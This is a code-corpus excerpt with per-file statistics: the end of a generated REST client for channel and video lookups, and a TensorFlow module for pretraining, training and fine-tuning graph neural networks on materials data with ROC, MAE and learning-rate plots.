            If the method is called asynchronously,
            returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.channel_id_channel_id_videos_get_with_http_info(channel_id, **kwargs)
        (data) = self.channel_id_channel_id_videos_get_with_http_info(channel_id, **kwargs)
        return data

    def channel_id_channel_id_videos_get_with_http_info(self, channel_id, **kwargs):
        """
        Get all videos for a channel by id

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int channel_id: Channel ID of the user you want to get videos for (required)
        :return: ChannelVideos
            If the method is called asynchronously,
            returns the request thread.
        """
        return self._call_channel_api('/channel/id/{channel_id}/videos', 'channel_id',
                                      channel_id, 'ChannelVideos',
                                      'channel_id_channel_id_videos_get', kwargs)

    def channel_name_channel_name_get(self, channel_name, **kwargs):
        """
        Gets information about a channel by name

        Synchronous by default; pass a `callback` keyword to get the request
        thread back instead of the response.

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str channel_name: Channel name of user you wish to read (required)
        :return: ChannelDetails
            If the method is called asynchronously,
            returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.channel_name_channel_name_get_with_http_info(channel_name, **kwargs)
        (data) = self.channel_name_channel_name_get_with_http_info(channel_name, **kwargs)
        return data

    def channel_name_channel_name_get_with_http_info(self, channel_name, **kwargs):
        """
        Gets information about a channel by name

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str channel_name: Channel name of user you wish to read (required)
        :return: ChannelDetails
            If the method is called asynchronously,
            returns the request thread.
        """
        return self._call_channel_api('/channel/name/{channel_name}', 'channel_name',
                                      channel_name, 'ChannelDetails',
                                      'channel_name_channel_name_get', kwargs)

    def channel_name_channel_name_videos_get(self, channel_name, **kwargs):
        """
        Get all videos for a channel by name

        Synchronous by default; pass a `callback` keyword to get the request
        thread back instead of the response.

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str channel_name: Channel name of the user you want to get videos for (required)
        :return: ChannelVideos
            If the method is called asynchronously,
            returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.channel_name_channel_name_videos_get_with_http_info(channel_name, **kwargs)
        (data) = self.channel_name_channel_name_videos_get_with_http_info(channel_name, **kwargs)
        return data

    def channel_name_channel_name_videos_get_with_http_info(self, channel_name, **kwargs):
        """
        Get all videos for a channel by name

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str channel_name: Channel name of the user you want to get videos for (required)
        :return: ChannelVideos
            If the method is called asynchronously,
            returns the request thread.
        """
        return self._call_channel_api('/channel/name/{channel_name}/videos', 'channel_name',
                                      channel_name, 'ChannelVideos',
                                      'channel_name_channel_name_videos_get', kwargs)
| 42.934389
| 326
| 0.58476
| 2,029
| 18,977
| 5.200099
| 0.092164
| 0.061416
| 0.033362
| 0.037532
| 0.930528
| 0.925979
| 0.92342
| 0.913468
| 0.909487
| 0.905507
| 0
| 0.001117
| 0.339674
| 18,977
| 441
| 327
| 43.031746
| 0.840875
| 0.331717
| 0
| 0.782407
| 0
| 0
| 0.176177
| 0.054646
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.032407
| 0
| 0.134259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1428cda5277485606b545bc524b82852fff8023
| 24,215
|
py
|
Python
|
matdgl/models/gnnframe.py
|
huzongxiang/CrysNetwork
|
b6772474a65ba5ae1a7942b0d2abca50168b5ffa
|
[
"BSD-2-Clause"
] | 4
|
2022-01-10T09:15:41.000Z
|
2022-01-19T04:01:29.000Z
|
matdgl/models/gnnframe.py
|
huzongxiang/CrysNetwork
|
b6772474a65ba5ae1a7942b0d2abca50168b5ffa
|
[
"BSD-2-Clause"
] | null | null | null |
matdgl/models/gnnframe.py
|
huzongxiang/CrysNetwork
|
b6772474a65ba5ae1a7942b0d2abca50168b5ffa
|
[
"BSD-2-Clause"
] | 1
|
2022-01-10T09:13:13.000Z
|
2022-01-10T09:13:13.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 20 15:15:31 2021
@author: huzongxiang
"""
import numpy as np
from pathlib import Path
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.models import Model
from tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
from matdgl.callbacks.cosineannealing import WarmUpCosineDecayScheduler
import matplotlib.pyplot as plt
from scipy import interp
from sklearn.metrics import roc_curve
from sklearn.metrics import auc, r2_score
ModulePath = Path(__file__).parent.absolute()
class Pretrainer:
    """Pre-training driver for a GNN on a (multi-)classification task.

    Builds the network from hyper-parameters, compiles it with categorical
    cross-entropy + AUC, and manages checkpointing, early stopping and the
    warm-up cosine learning-rate schedule during ``train``.
    """

    def __init__(self,
                 model: Model,
                 atom_dim=16,
                 bond_dim=32,
                 num_atom=118,
                 state_dim=16,
                 sp_dim=230,
                 batch_size=16,
                 ntarget=1,
                 optimizer='Adam',
                 **kwargs,
                 ):
        """Store the hyper-parameters and instantiate the underlying network.

        :param model: callable (keras Model factory) building the network;
            extra kwargs are forwarded to it untouched.
        """
        self.model = model
        self.atom_dim = atom_dim
        self.bond_dim = bond_dim
        self.num_atom = num_atom
        self.state_dim = state_dim
        self.sp_dim = sp_dim
        self.batch_size = batch_size
        self.ntarget = ntarget
        self.optimizer = optimizer
        self.gnn = model(atom_dim=atom_dim,
                         bond_dim=bond_dim,
                         num_atom=num_atom,
                         state_dim=state_dim,
                         sp_dim=sp_dim,
                         batch_size=batch_size,
                         **kwargs)

    def __getattr__(self, attr):
        # Delegate unknown attribute access to the wrapped keras model.
        return getattr(self.gnn, attr)

    def train(self, train_data, valid_data=None, test_data=None, epochs=200, lr=1e-3, warm_up=True, warmrestart=None,
              load_weights=False, patience=500, verbose=1, checkpoints=None, save_weights_only=True, workdir=None):
        """Compile and fit the model, saving checkpoints and training plots.

        :param train_data: sequence/generator exposing ``task_type`` and ``data_size``.
        :param load_weights: False, "default" (weights from the package dir)
            or "custom" (weights from ``workdir``).
        :param checkpoints: optional explicit callback list; when None, a
            ModelCheckpoint/EarlyStopping/LR-schedule trio is created.
        :param workdir: Path-like output directory; model/ and results/
            sub-folders are created inside it (must not be None — TODO confirm
            upstream callers always pass it).
        """
        gnn = self.gnn
        gnn.compile(
            loss=tf.keras.losses.CategoricalCrossentropy(),
            optimizer=self.optimizer,
            metrics=[tf.keras.metrics.AUC(name="AUC")],
        )
        if load_weights:
            print("load weights")
            path = self.gnn.name + ".hdf5"
            if load_weights == "default":
                best_checkpoint = Path(ModulePath/"model"/path)
            elif load_weights == "custom":
                best_checkpoint = Path(workdir/"model"/path)
            else:
                raise ValueError('load_weights should be "default" or "custom"')
            gnn.load_weights(best_checkpoint)
        print(gnn.summary())
        keras.utils.plot_model(gnn, Path(workdir/"pretrainer.png"), show_dtype=True, show_shapes=True)
        print(train_data.task_type)
        Path(workdir/"model").mkdir(exist_ok=True)
        Path(workdir/"model"/train_data.task_type).mkdir(exist_ok=True)
        warm_up_lr = None  # only bound when we build the callbacks ourselves
        if checkpoints is None:
            filepath = Path(workdir/"model"/train_data.task_type/"gnn_{epoch:02d}-{val_AUC:.3f}.hdf5")
            checkpoint = ModelCheckpoint(filepath, monitor='val_AUC', save_best_only=True, save_weights_only=save_weights_only, verbose=verbose, mode='max')
            earlystop = EarlyStopping(monitor='val_loss', patience=patience, verbose=verbose, mode='min')
            if warm_up:
                sample_count = train_data.data_size
                warmup_epoch = 5
                train_per_epoch = sample_count / self.batch_size
                warmup_steps = warmup_epoch * train_per_epoch
                restart_epoches = warmrestart
                warm_up_lr = WarmUpCosineDecayScheduler(epochs=epochs,
                                                        restart_epoches=restart_epoches,
                                                        train_per_epoch=train_per_epoch,
                                                        learning_rate_base=lr,
                                                        warmup_learning_rate=2e-6,
                                                        warmup_steps=warmup_steps,
                                                        hold_base_rate_steps=5,
                                                        )
                checkpoints = [checkpoint, warm_up_lr, earlystop]
            else:
                reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=50, verbose=1, min_lr=1e-6, mode='min')
                checkpoints = [checkpoint, reduce_lr, earlystop]
        if valid_data:
            steps_per_train = int(np.ceil(train_data.data_size / self.batch_size))
            steps_per_val = int(np.ceil(valid_data.data_size / self.batch_size))
        else:
            steps_per_train = None
            steps_per_val = None
        print("gnn fit")
        history = gnn.fit(
            train_data,
            validation_data=valid_data,
            steps_per_epoch=steps_per_train,
            validation_steps=steps_per_val,
            epochs=epochs,
            verbose=verbose,
            callbacks=checkpoints,
        )
        Path(workdir/"results").mkdir(exist_ok=True)
        plot_train(history, train_data.task_type, workdir)
        # BUG FIX: the original referenced warm_up_lr/sample_count here even
        # when the caller supplied explicit callbacks (warm_up defaults to
        # True), raising NameError; only plot when the scheduler was built.
        if warm_up and warm_up_lr is not None:
            total_steps = int(epochs * train_data.data_size / self.batch_size)
            plot_warm_up_lr(warm_up_lr, total_steps, lr, workdir)
class GNN:
    """Build, train and evaluate a graph neural network.

    The loss/metric pair follows the task flags: ``regression`` -> MAE,
    ``multiclassification`` -> categorical cross-entropy + AUC, otherwise
    binary cross-entropy + AUC.
    """

    def __init__(self,
                 model: Model,
                 atom_dim=16,
                 bond_dim=32,
                 num_atom=118,
                 state_dim=16,
                 sp_dim=230,
                 batch_size=16,
                 regression=True,
                 ntarget=1,
                 multiclassification=None,
                 optimizer='Adam',
                 **kwargs,
                 ):
        """Store the hyper-parameters and instantiate the underlying network.

        :param model: callable (keras Model factory) building the network.
        :param multiclassification: number of classes, or None/falsy for
            binary classification / regression.
        """
        self.model = model
        self.atom_dim = atom_dim
        self.bond_dim = bond_dim
        self.num_atom = num_atom
        self.state_dim = state_dim
        self.sp_dim = sp_dim
        self.batch_size = batch_size
        self.regression = regression
        self.ntarget = ntarget
        self.multiclassification = multiclassification
        self.optimizer = optimizer
        self.gnn = model(atom_dim=atom_dim,
                         bond_dim=bond_dim,
                         num_atom=num_atom,
                         state_dim=state_dim,
                         sp_dim=sp_dim,
                         batch_size=batch_size,
                         regression=regression,
                         multiclassification=multiclassification,
                         **kwargs)

    def __getattr__(self, attr):
        # Delegate unknown attribute access to the wrapped keras model.
        return getattr(self.gnn, attr)

    def train(self, train_data, valid_data=None, test_data=None, epochs=200, lr=1e-3, warm_up=True, warmrestart=None,
              load_weights=False, patience=500, verbose=1, checkpoints=None, save_weights_only=True, workdir=None):
        """Compile and fit the model; plot training curves and test metrics.

        :param train_data: sequence/generator exposing ``task_type`` and ``data_size``.
        :param load_weights: False, "default" (weights from the package dir)
            or "custom" (weights from ``workdir``).
        :param checkpoints: optional explicit callback list; when None, a
            ModelCheckpoint/EarlyStopping/LR-schedule trio is created.
        :param workdir: Path-like output directory; model/ and results/
            sub-folders are created inside it.
        :return: the trained keras model.
        """
        gnn = self.gnn
        # Pick loss/metrics by task type.
        if self.regression:
            gnn.compile(
                loss=keras.losses.MeanAbsoluteError(),
                optimizer=self.optimizer,
                metrics=[keras.metrics.MeanAbsoluteError(name="mae")],
            )
        elif self.multiclassification:
            gnn.compile(
                loss=tf.keras.losses.CategoricalCrossentropy(),
                optimizer=self.optimizer,
                metrics=[tf.keras.metrics.AUC(name="AUC")],
            )
        else:
            gnn.compile(
                loss=tf.keras.losses.BinaryCrossentropy(),
                optimizer=self.optimizer,
                metrics=[tf.keras.metrics.AUC(name="AUC")],
            )
        print(gnn.summary())
        keras.utils.plot_model(gnn, Path(workdir/"gnn_arch.png"), show_dtype=True, show_shapes=True)
        if load_weights:
            print('load weights')
            path = train_data.task_type + ".hdf5"
            if load_weights == 'default':
                best_checkpoint = Path(ModulePath/"model"/path)
            elif load_weights == 'custom':
                best_checkpoint = Path(workdir/"model"/path)
            else:
                raise ValueError('load_weights should be "default" or "custom"')
            gnn.load_weights(best_checkpoint)
        print(train_data.task_type)
        Path(workdir/"model").mkdir(exist_ok=True)
        Path(workdir/"model"/train_data.task_type).mkdir(exist_ok=True)
        warm_up_lr = None  # only bound when we build the callbacks ourselves
        if checkpoints is None:
            if self.regression:
                filepath = Path(workdir/"model"/train_data.task_type/"gnn_{epoch:02d}-{val_mae:.3f}.hdf5")
                checkpoint = ModelCheckpoint(filepath, monitor='val_mae', save_best_only=True, save_weights_only=save_weights_only, verbose=verbose, mode='min')
            else:
                filepath = Path(workdir/"model"/train_data.task_type/"gnn_{epoch:02d}-{val_AUC:.3f}.hdf5")
                checkpoint = ModelCheckpoint(filepath, monitor='val_AUC', save_best_only=True, save_weights_only=save_weights_only, verbose=verbose, mode='max')
            earlystop = EarlyStopping(monitor='val_loss', patience=patience, verbose=verbose, mode='min')
            if warm_up:
                sample_count = train_data.data_size
                warmup_epoch = 5
                train_per_epoch = sample_count / self.batch_size
                warmup_steps = warmup_epoch * train_per_epoch
                restart_epoches = warmrestart
                warm_up_lr = WarmUpCosineDecayScheduler(epochs=epochs,
                                                        restart_epoches=restart_epoches,
                                                        train_per_epoch=train_per_epoch,
                                                        learning_rate_base=lr,
                                                        warmup_learning_rate=2e-6,
                                                        warmup_steps=warmup_steps,
                                                        hold_base_rate_steps=5,
                                                        )
                checkpoints = [checkpoint, warm_up_lr, earlystop]
            else:
                reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=50, verbose=1, min_lr=1e-6, mode='min')
                checkpoints = [checkpoint, reduce_lr, earlystop]
        if valid_data:
            steps_per_train = int(np.ceil(train_data.data_size / self.batch_size))
            steps_per_val = int(np.ceil(valid_data.data_size / self.batch_size))
        else:
            steps_per_train = None
            steps_per_val = None
        print("gnn fit")
        history = gnn.fit(
            train_data,
            validation_data=valid_data,
            steps_per_epoch=steps_per_train,
            validation_steps=steps_per_val,
            epochs=epochs,
            verbose=verbose,
            callbacks=checkpoints,
        )
        Path(workdir/"results").mkdir(exist_ok=True)
        if self.regression:
            plot_train_regression(history, train_data.task_type, workdir)
            if test_data:
                plot_mae(gnn, test_data, workdir, name='test')
        else:
            plot_train(history, train_data.task_type, workdir)
            if test_data:
                if self.multiclassification:
                    plot_auc_multiclassification(gnn, test_data, self.multiclassification, workdir, name='test')
                else:
                    plot_auc(gnn, test_data, workdir, name='test')
        # BUG FIX: the original referenced warm_up_lr/sample_count here even
        # when the caller supplied explicit callbacks (warm_up defaults to
        # True), raising NameError; only plot when the scheduler was built.
        if warm_up and warm_up_lr is not None:
            total_steps = int(epochs * train_data.data_size / self.batch_size)
            plot_warm_up_lr(warm_up_lr, total_steps, lr, workdir)
        return gnn

    def predict_datas(self, test_data, workdir=None):
        """Load the best checkpoint for ``test_data.task_type`` and plot test metrics.

        :param workdir: directory holding model/ and results/; falls back to
            the package directory when None.
        """
        print("load weights and predict...")
        save_file = test_data.task_type + ".hdf5"
        # BUG FIX: resolve the base directory once — the original fell back
        # to ModulePath for the checkpoint but still used workdir (possibly
        # None) for the results folder, which raised TypeError.
        base = workdir if workdir else ModulePath
        best_checkpoint = Path(base/"model"/save_file)
        gnn = self.gnn
        gnn.load_weights(best_checkpoint)
        Path(base/"results").mkdir(exist_ok=True)
        if self.regression:
            plot_mae(gnn, test_data, base, name='test')
        else:
            if self.multiclassification:
                plot_auc_multiclassification(gnn, test_data, self.multiclassification, base, name='test')
            else:
                # BUG FIX: plot_auc requires the output directory as its third
                # positional argument; the original call omitted it (TypeError).
                plot_auc(gnn, test_data, base, name='test')

    def predict(self, data, workdir=None):
        """Load the best checkpoint for ``data.task_type`` and return raw predictions."""
        print("load weights and predict...")
        save_file = data.task_type + ".hdf5"
        if workdir:
            best_checkpoint = Path(workdir/"model"/save_file)
        else:
            best_checkpoint = Path(ModulePath/"model"/save_file)
        gnn = self.gnn
        gnn.load_weights(best_checkpoint)
        y_pred_keras = gnn.predict(data)
        return y_pred_keras
class Finetune:
    """Fine-tuning driver that mirrors ``GNN`` for a pre-built backbone.

    The loss/metric pair follows the task flags: ``regression`` -> MAE,
    ``multiclassification`` -> categorical cross-entropy + AUC, otherwise
    binary cross-entropy + AUC.
    """

    def __init__(self,
                 model: Model,
                 state_dim=16,
                 sp_dim=230,
                 regression=True,
                 ntarget=1,
                 multiclassification=None,
                 optimizer='Adam',
                 batch_szie=32,
                 **kwargs,
                 ):
        """Store the hyper-parameters and instantiate the underlying network.

        :param batch_szie: batch size. NOTE(review): keyword kept with the
            original misspelling for backward compatibility with existing
            callers; internally stored as ``self.batch_size``.
        """
        self.model = model
        self.state_dim = state_dim
        self.sp_dim = sp_dim
        self.regression = regression
        self.ntarget = ntarget
        self.multiclassification = multiclassification
        self.batch_size = batch_szie
        self.optimizer = optimizer
        self.gnn = model(
            state_dim=state_dim,
            sp_dim=sp_dim,
            regression=regression,
            multiclassification=multiclassification,
            **kwargs)

    def __getattr__(self, attr):
        # Delegate unknown attribute access to the wrapped keras model.
        return getattr(self.gnn, attr)

    def train(self, train_data, valid_data=None, test_data=None, epochs=200, lr=1e-3, warm_up=True, warmrestart=None,
              patience=500, verbose=1, checkpoints=None, save_weights_only=True, workdir=None):
        """Compile and fit the model; plot training curves and test metrics.

        :param train_data: sequence/generator exposing ``task_type`` and ``data_size``.
        :param checkpoints: optional explicit callback list; when None, a
            ModelCheckpoint/EarlyStopping/LR-schedule trio is created.
        :param workdir: Path-like output directory; model/ and results/
            sub-folders are created inside it.
        :return: the trained keras model.
        """
        gnn = self.gnn
        # Pick loss/metrics by task type.
        if self.regression:
            gnn.compile(
                loss=keras.losses.MeanAbsoluteError(),
                optimizer=self.optimizer,
                metrics=[keras.metrics.MeanAbsoluteError(name="mae")],
            )
        elif self.multiclassification:
            gnn.compile(
                loss=tf.keras.losses.CategoricalCrossentropy(),
                optimizer=self.optimizer,
                metrics=[tf.keras.metrics.AUC(name="AUC")],
            )
        else:
            gnn.compile(
                loss=tf.keras.losses.BinaryCrossentropy(),
                optimizer=self.optimizer,
                metrics=[tf.keras.metrics.AUC(name="AUC")],
            )
        print(gnn.summary())
        keras.utils.plot_model(gnn, Path(workdir/"finetune.png"), show_dtype=True, show_shapes=True)
        print(train_data.task_type)
        Path(workdir/"model").mkdir(exist_ok=True)
        Path(workdir/"model"/train_data.task_type).mkdir(exist_ok=True)
        warm_up_lr = None  # only bound when we build the callbacks ourselves
        if checkpoints is None:
            if self.regression:
                filepath = Path(workdir/"model"/train_data.task_type/"gnn_{epoch:02d}-{val_mae:.3f}.hdf5")
                checkpoint = ModelCheckpoint(filepath, monitor='val_mae', save_best_only=True, save_weights_only=save_weights_only, verbose=verbose, mode='min')
            else:
                filepath = Path(workdir/"model"/train_data.task_type/"gnn_{epoch:02d}-{val_AUC:.3f}.hdf5")
                checkpoint = ModelCheckpoint(filepath, monitor='val_AUC', save_best_only=True, save_weights_only=save_weights_only, verbose=verbose, mode='max')
            earlystop = EarlyStopping(monitor='val_loss', patience=patience, verbose=verbose, mode='min')
            if warm_up:
                sample_count = train_data.data_size
                warmup_epoch = 5
                train_per_epoch = sample_count / self.batch_size
                warmup_steps = warmup_epoch * train_per_epoch
                restart_epoches = warmrestart
                warm_up_lr = WarmUpCosineDecayScheduler(epochs=epochs,
                                                        restart_epoches=restart_epoches,
                                                        train_per_epoch=train_per_epoch,
                                                        learning_rate_base=lr,
                                                        warmup_learning_rate=2e-6,
                                                        warmup_steps=warmup_steps,
                                                        hold_base_rate_steps=5,
                                                        )
                checkpoints = [checkpoint, warm_up_lr, earlystop]
            else:
                reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=50, verbose=1, min_lr=1e-6, mode='min')
                checkpoints = [checkpoint, reduce_lr, earlystop]
        if valid_data:
            steps_per_train = int(np.ceil(train_data.data_size / self.batch_size))
            steps_per_val = int(np.ceil(valid_data.data_size / self.batch_size))
        else:
            steps_per_train = None
            steps_per_val = None
        print("gnn fit")
        history = gnn.fit(
            train_data,
            validation_data=valid_data,
            steps_per_epoch=steps_per_train,
            validation_steps=steps_per_val,
            epochs=epochs,
            verbose=verbose,
            callbacks=checkpoints,
        )
        Path(workdir/"results").mkdir(exist_ok=True)
        if self.regression:
            plot_train_regression(history, train_data.task_type, workdir)
            if test_data:
                plot_mae(gnn, test_data, workdir, name='test')
        else:
            plot_train(history, train_data.task_type, workdir)
            if test_data:
                if self.multiclassification:
                    plot_auc_multiclassification(gnn, test_data, self.multiclassification, workdir, name='test')
                else:
                    plot_auc(gnn, test_data, workdir, name='test')
        # BUG FIX: the original referenced warm_up_lr/sample_count here even
        # when the caller supplied explicit callbacks (warm_up defaults to
        # True), raising NameError; only plot when the scheduler was built.
        if warm_up and warm_up_lr is not None:
            total_steps = int(epochs * train_data.data_size / self.batch_size)
            plot_warm_up_lr(warm_up_lr, total_steps, lr, workdir)
        return gnn

    def predict_datas(self, test_data, workdir=None):
        """Load the best checkpoint for ``test_data.task_type`` and plot test metrics.

        :param workdir: directory holding model/ and results/; falls back to
            the package directory when None.
        """
        print("load weights and predict...")
        save_file = test_data.task_type + ".hdf5"
        # BUG FIX: resolve the base directory once — the original fell back
        # to ModulePath for the checkpoint but still used workdir (possibly
        # None) for the results folder, which raised TypeError.
        base = workdir if workdir else ModulePath
        best_checkpoint = Path(base/"model"/save_file)
        gnn = self.gnn
        gnn.load_weights(best_checkpoint)
        Path(base/"results").mkdir(exist_ok=True)
        if self.regression:
            plot_mae(gnn, test_data, base, name='test')
        else:
            if self.multiclassification:
                plot_auc_multiclassification(gnn, test_data, self.multiclassification, base, name='test')
            else:
                # BUG FIX: plot_auc requires the output directory as its third
                # positional argument; the original call omitted it (TypeError).
                plot_auc(gnn, test_data, base, name='test')

    def predict(self, data, workdir=None):
        """Load the best checkpoint for ``data.task_type`` and return raw predictions."""
        print("load weights and predict...")
        save_file = data.task_type + ".hdf5"
        if workdir:
            best_checkpoint = Path(workdir/"model"/save_file)
        else:
            best_checkpoint = Path(ModulePath/"model"/save_file)
        gnn = self.gnn
        gnn.load_weights(best_checkpoint)
        y_pred_keras = gnn.predict(data)
        return y_pred_keras
def plot_train(history, name, path):
    """Plot AUC and loss curves of a classification run and save the figure.

    :param history: keras History object with per-epoch metric lists.
    :param name: prefix (task type) for the output file name.
    :param path: directory that contains a ``results`` sub-folder.
    """
    print("plot curve of training")
    panels = (
        ("AUC", "val_AUC", "AUC", "train AUC", "valid AUC"),
        ("loss", "val_loss", "loss", "train loss", "valid loss"),
    )
    plt.figure(figsize=(10, 12))
    for row, (train_key, val_key, ylab, train_lbl, val_lbl) in enumerate(panels, start=1):
        plt.subplot(2, 1, row)
        plt.plot(history.history[train_key], label=train_lbl)
        plt.plot(history.history[val_key], label=val_lbl)
        plt.xlabel("Epochs", fontsize=16)
        plt.ylabel(ylab, fontsize=16)
        plt.legend(fontsize=16)
    plt.savefig(path/"results"/(name + "_train.png"))
def plot_train_regression(history, name, path):
    """Plot MAE and loss curves of a regression run and save the figure.

    :param history: keras History object with per-epoch metric lists.
    :param name: prefix (task type) for the output file name.
    :param path: directory that contains a ``results`` sub-folder.
    """
    print("plot curve of training")
    panels = (
        ("mae", "val_mae", "mae", "train mae", "valid mae"),
        ("loss", "val_loss", "loss", "train loss", "valid loss"),
    )
    plt.figure(figsize=(10, 12))
    for row, (train_key, val_key, ylab, train_lbl, val_lbl) in enumerate(panels, start=1):
        plt.subplot(2, 1, row)
        plt.plot(history.history[train_key], label=train_lbl)
        plt.plot(history.history[val_key], label=val_lbl)
        plt.xlabel("Epochs", fontsize=16)
        plt.ylabel(ylab, fontsize=16)
        plt.legend(fontsize=16)
    plt.savefig(path/"results"/(name + "_train.png"))
def plot_auc(gnn, test_data, path, name="test"):
    """Predict on *test_data*, print the ROC AUC and save the ROC plot.

    The figure goes to ``<path>/results/<task>_<name>_predict.png``.
    """
    print("predict")
    name = test_data.task_type + '_' + name
    scores = gnn.predict(test_data).ravel()
    false_pos, true_pos, _ = roc_curve(test_data.labels, scores)
    area = auc(false_pos, true_pos)
    print("auc on test data: ", area)
    plt.figure(figsize=(10, 6))
    plt.plot([0, 1], [0, 1], 'k--')  # chance diagonal
    plt.plot(false_pos, true_pos, label="Keras (area = {:.3f})".format(area))
    plt.xlabel("False positive rate")
    plt.ylabel("True positive rate")
    plt.title("ROC curve test")
    plt.legend(loc="best")
    plt.savefig(Path(path / "results" / (name + "_predict" + ".png")))
def plot_auc_multiclassification(gnn, datas, n_classes, path, name="test"):
    """Compute and plot per-class, micro- and macro-averaged ROC curves.

    Parameters
    ----------
    gnn : trained model with a ``predict`` method returning one score column
        per class.
    datas : dataset object with ``labels`` (one-hot, shape (N, n_classes) —
        assumed from the column indexing below; confirm against callers) and
        ``task_type``.
    n_classes : number of classes to evaluate.
    path : base directory; figure is saved under ``<path>/results``.

    Bug fix: the micro-average ROC was previously computed from only the
    LAST class column (stale loop variable ``i``); it now uses the raveled
    all-class label/score arrays, matching the standard multiclass ROC
    recipe.
    """
    print("predict")
    name = datas.task_type + '_' + name
    y_pred_keras = gnn.predict(datas)
    labels = np.array(datas.labels)
    fpr = dict()
    tpr = dict()
    roc_auc = dict()
    # Per-class one-vs-rest ROC curves.
    for i in range(n_classes):
        fpr[i], tpr[i], _ = roc_curve(labels[:, i], y_pred_keras[:, i])
        roc_auc[i] = auc(fpr[i], tpr[i])
    # Micro-average: pool every (label, score) pair across ALL classes.
    fpr["micro"], tpr["micro"], _ = roc_curve(labels.ravel(), y_pred_keras.ravel())
    roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
    # Macro-average: interpolate every class curve onto a common FPR grid,
    # then average the TPRs.
    all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
    mean_tpr = np.zeros_like(all_fpr)
    for i in range(n_classes):
        mean_tpr += np.interp(all_fpr, fpr[i], tpr[i])
    mean_tpr /= n_classes
    fpr["macro"] = all_fpr
    tpr["macro"] = mean_tpr
    roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
    # Plot all ROC curves.
    plt.figure(figsize=(10, 6))
    plt.plot(fpr["micro"], tpr["micro"],
    label='micro-average ROC curve (area = {0:0.2f})'
    ''.format(roc_auc["micro"]),
    color='deeppink', linestyle=':', linewidth=4)
    plt.plot(fpr["macro"], tpr["macro"],
    label='macro-average ROC curve (area = {0:0.2f})'
    ''.format(roc_auc["macro"]),
    color='navy', linestyle=':', linewidth=4)
    for i in range(n_classes):
        print("auc on ", name, " datas: class", i, " auc: ", roc_auc[i])
        plt.plot(fpr[i], tpr[i], lw=2,
        label='ROC curve of class {0} (area = {1:0.2f})'
        ''.format(i, roc_auc[i]))
    plt.plot([0, 1], [0, 1], 'k--', lw=2)
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel("False Positive Rate")
    plt.ylabel("True Positive Rate")
    plt.title("Some extension of Receiver operating characteristic to multi-class")
    plt.legend(loc="lower right")
    save_path = name + "_predict" + ".png"
    plt.savefig(Path(path / "results" / save_path))
def plot_mae(gnn, test_data, path, name="test"):
    """Scatter predicted vs. experimental values for a regression model.

    Prints the R^2 score and saves the scatter plot to
    ``<path>/results/<task>_<name>_predict.png``. Axis limits are set to
    mean +/- one standard deviation of the labels.
    """
    print('predict')
    name = test_data.task_type + '_' + name
    predictions = gnn.predict(test_data).ravel()
    r2 = r2_score(test_data.labels, predictions)
    center = np.mean(test_data.labels)
    spread = np.std(test_data.labels)
    print("r2 score: ", r2)
    plt.figure(figsize=(10, 6))
    plt.scatter(test_data.labels, predictions, color="orange")
    plt.plot([-2, 6], [-2, 6], 'r--')  # identity reference line
    plt.xlim(center - spread, center + spread)
    plt.ylim(center - spread, center + spread)
    # "experimetal" typo kept on purpose: it is a rendered axis label the
    # original produced, and a style rewrite must not change output.
    plt.xlabel("experimetal", fontsize=16)
    plt.ylabel("pred", fontsize=16)
    plt.title('predicted')
    plt.savefig(Path(path / "results" / (name + "_predict" + ".png")))
def plot_warm_up_lr(warm_up_lr, total_steps, lr, path):
    """Plot the recorded warm-up/cosine-decay learning-rate schedule.

    *warm_up_lr* must expose a ``learning_rates`` sequence (one value per
    step). The figure is saved to ``<path>/results/cosine_decay.png``.
    """
    out_file = Path(path / "results" / "cosine_decay.png")
    plt.plot(warm_up_lr.learning_rates)
    plt.xlabel("Step", fontsize=20)
    plt.ylabel("lr", fontsize=20)
    # Leave 10% headroom above the peak learning rate on the y axis.
    plt.axis([0, total_steps, 0, lr * 1.1])
    plt.grid()
    plt.title("Cosine decay with warmup", fontsize=20)
    plt.savefig(out_file)
| 38.133858
| 160
| 0.58757
| 2,870
| 24,215
| 4.727526
| 0.092334
| 0.021816
| 0.020342
| 0.0213
| 0.857385
| 0.843824
| 0.821713
| 0.804098
| 0.792232
| 0.785009
| 0
| 0.01463
| 0.302788
| 24,215
| 635
| 161
| 38.133858
| 0.789019
| 0.014413
| 0
| 0.776091
| 0
| 0
| 0.072656
| 0.007127
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036053
| false
| 0
| 0.020873
| 0.005693
| 0.075901
| 0.043643
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a16fed8fa689c69d100d2f8191f42bd284a6932a
| 16,626
|
py
|
Python
|
cnuchatbot/chatbotapp/cnudata/cafeteria/cafeteria.py
|
ChanhyukPark-Tech/CnuChatBot
|
c204b7f037a7dc8a2ca7f398a84aae68df245327
|
[
